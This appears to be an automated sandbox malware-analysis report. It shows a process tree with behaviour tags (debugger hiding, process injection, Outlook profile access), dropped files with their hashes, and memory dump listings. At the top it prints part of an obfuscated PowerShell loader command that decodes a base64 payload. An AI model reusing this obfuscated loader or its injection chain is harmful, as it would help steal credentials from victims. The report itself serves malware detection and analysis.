'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
            4⤵
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:404
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3212
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
                PID:4900
              • C:\Program Files (x86)\windows mail\wabmig.exe
                "C:\Program Files (x86)\windows mail\wabmig.exe"
                5⤵
                  PID:2500
                • C:\Program Files (x86)\windows mail\wabmig.exe
                  "C:\Program Files (x86)\windows mail\wabmig.exe"
                  5⤵
                    PID:3640
                  • C:\Program Files (x86)\windows mail\wabmig.exe
                    "C:\Program Files (x86)\windows mail\wabmig.exe"
                    5⤵
                      PID:2824
                    • C:\Program Files (x86)\windows mail\wabmig.exe
                      "C:\Program Files (x86)\windows mail\wabmig.exe"
                      5⤵
                        PID:2864
                      • C:\Program Files (x86)\windows mail\wabmig.exe
                        "C:\Program Files (x86)\windows mail\wabmig.exe"
                        5⤵
                          PID:4336
                        • C:\Program Files (x86)\windows mail\wabmig.exe
                          "C:\Program Files (x86)\windows mail\wabmig.exe"
                          5⤵
                            PID:4564
                          • C:\Program Files (x86)\windows mail\wabmig.exe
                            "C:\Program Files (x86)\windows mail\wabmig.exe"
                            5⤵
                              PID:3984
                            • C:\Program Files (x86)\windows mail\wabmig.exe
                              "C:\Program Files (x86)\windows mail\wabmig.exe"
                              5⤵
                                PID:3904
                              • C:\Program Files (x86)\windows mail\wabmig.exe
                                "C:\Program Files (x86)\windows mail\wabmig.exe"
                                5⤵
                                  PID:5104
                                • C:\Program Files (x86)\windows mail\wabmig.exe
                                  "C:\Program Files (x86)\windows mail\wabmig.exe"
                                  5⤵
                                    PID:5020
                                  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                    5⤵
                                    • Accesses Microsoft Outlook profiles
                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    • outlook_office_path
                                    • outlook_win_path
                                    PID:1712

                          Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_54lis5cz.pxz.ps1
                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  Download Submit

                                • C:\Users\Admin\AppData\Roaming\Hygrophthalmic.dis
                                  Filesize

                                  474KB

                                  MD5

                                  a79506f805546d94c4280f98dcdd84a8

                                  SHA1

                                  b641bc5daef6955be1a63bfe38c6a941e3cab344

                                  SHA256

                                  a297eab229c20b75972e29a8ed769faeede656a3ab7e6646c19fd7a33eb7e633

                                  SHA512

                                  2082aa32a661c677014bfdd04b2ed24b9a04cc45295ce61a12b35dff6deccbeade24f6f78e5682768fb48a98337c8fd61c6b6bff6066f770ced3d399d602b8ec

                                  Download Submit

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-945322488-2060912225-3527527000-1000\0f5007522459c86e95ffcc62f32308f1_03d68389-5a68-4d9e-92ac-47b927e624dd
                                  Filesize

                                  46B

                                  MD5

                                  d898504a722bff1524134c6ab6a5eaa5

                                  SHA1

                                  e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

                                  SHA256

                                  878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

                                  SHA512

                                  26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

                                  Download Submit

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-945322488-2060912225-3527527000-1000\0f5007522459c86e95ffcc62f32308f1_03d68389-5a68-4d9e-92ac-47b927e624dd
                                  Filesize

                                  46B

                                  MD5

                                  c07225d4e7d01d31042965f048728a0a

                                  SHA1

                                  69d70b340fd9f44c89adb9a2278df84faa9906b7

                                  SHA256

                                  8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

                                  SHA512

                                  23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

                                  Download Submit

                                • memory/404-44-0x00000000087A0000-0x0000000008D44000-memory.dmp

                                  Filesize

                                  5.6MB

                                  Download

                                • memory/404-38-0x0000000006360000-0x00000000063AC000-memory.dmp

                                  Filesize

                                  304KB

                                  Download

                                • memory/404-46-0x0000000008D50000-0x000000000B05E000-memory.dmp

                                  Filesize

                                  35.1MB

                                  Download

                                • memory/404-43-0x0000000007550000-0x0000000007572000-memory.dmp

                                  Filesize

                                  136KB

                                  Download

                                • memory/404-22-0x0000000004E90000-0x0000000004EC6000-memory.dmp

                                  Filesize

                                  216KB

                                  Download

                                • memory/404-23-0x0000000005500000-0x0000000005B28000-memory.dmp

                                  Filesize

                                  6.2MB

                                  Download

                                • memory/404-24-0x0000000005480000-0x00000000054A2000-memory.dmp

                                  Filesize

                                  136KB

                                  Download

                                • memory/404-25-0x0000000005BA0000-0x0000000005C06000-memory.dmp

                                  Filesize

                                  408KB

                                  Download

                                • memory/404-26-0x0000000005C10000-0x0000000005C76000-memory.dmp

                                  Filesize

                                  408KB

                                  Download

                                • memory/404-36-0x0000000005D00000-0x0000000006054000-memory.dmp

                                  Filesize

                                  3.3MB

                                  Download

                                • memory/404-37-0x0000000006330000-0x000000000634E000-memory.dmp

                                  Filesize

                                  120KB

                                  Download

                                • memory/404-42-0x00000000075C0000-0x0000000007656000-memory.dmp

                                  Filesize

                                  600KB

                                  Download

                                • memory/404-41-0x00000000068C0000-0x00000000068DA000-memory.dmp

                                  Filesize

                                  104KB

                                  Download

                                • memory/404-40-0x0000000007B70000-0x00000000081EA000-memory.dmp

                                  Filesize

                                  6.5MB

                                  Download

                                • memory/1800-39-0x00007FFE70E10000-0x00007FFE718D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/1800-18-0x00007FFE70E13000-0x00007FFE70E15000-memory.dmp

                                  Filesize

                                  8KB

                                  Download

                                • memory/1800-21-0x00007FFE70E10000-0x00007FFE718D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/1800-4-0x00007FFE70E13000-0x00007FFE70E15000-memory.dmp

                                  Filesize

                                  8KB

                                  Download

                                • memory/1800-16-0x00007FFE70E10000-0x00007FFE718D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/1800-19-0x00007FFE70E10000-0x00007FFE718D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/1800-47-0x00007FFE70E10000-0x00007FFE718D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/1800-63-0x00007FFE70E10000-0x00007FFE718D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/1800-15-0x00007FFE70E10000-0x00007FFE718D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/1800-6-0x000001939EC20000-0x000001939EC42000-memory.dmp

                                  Filesize

                                  136KB

                                  Download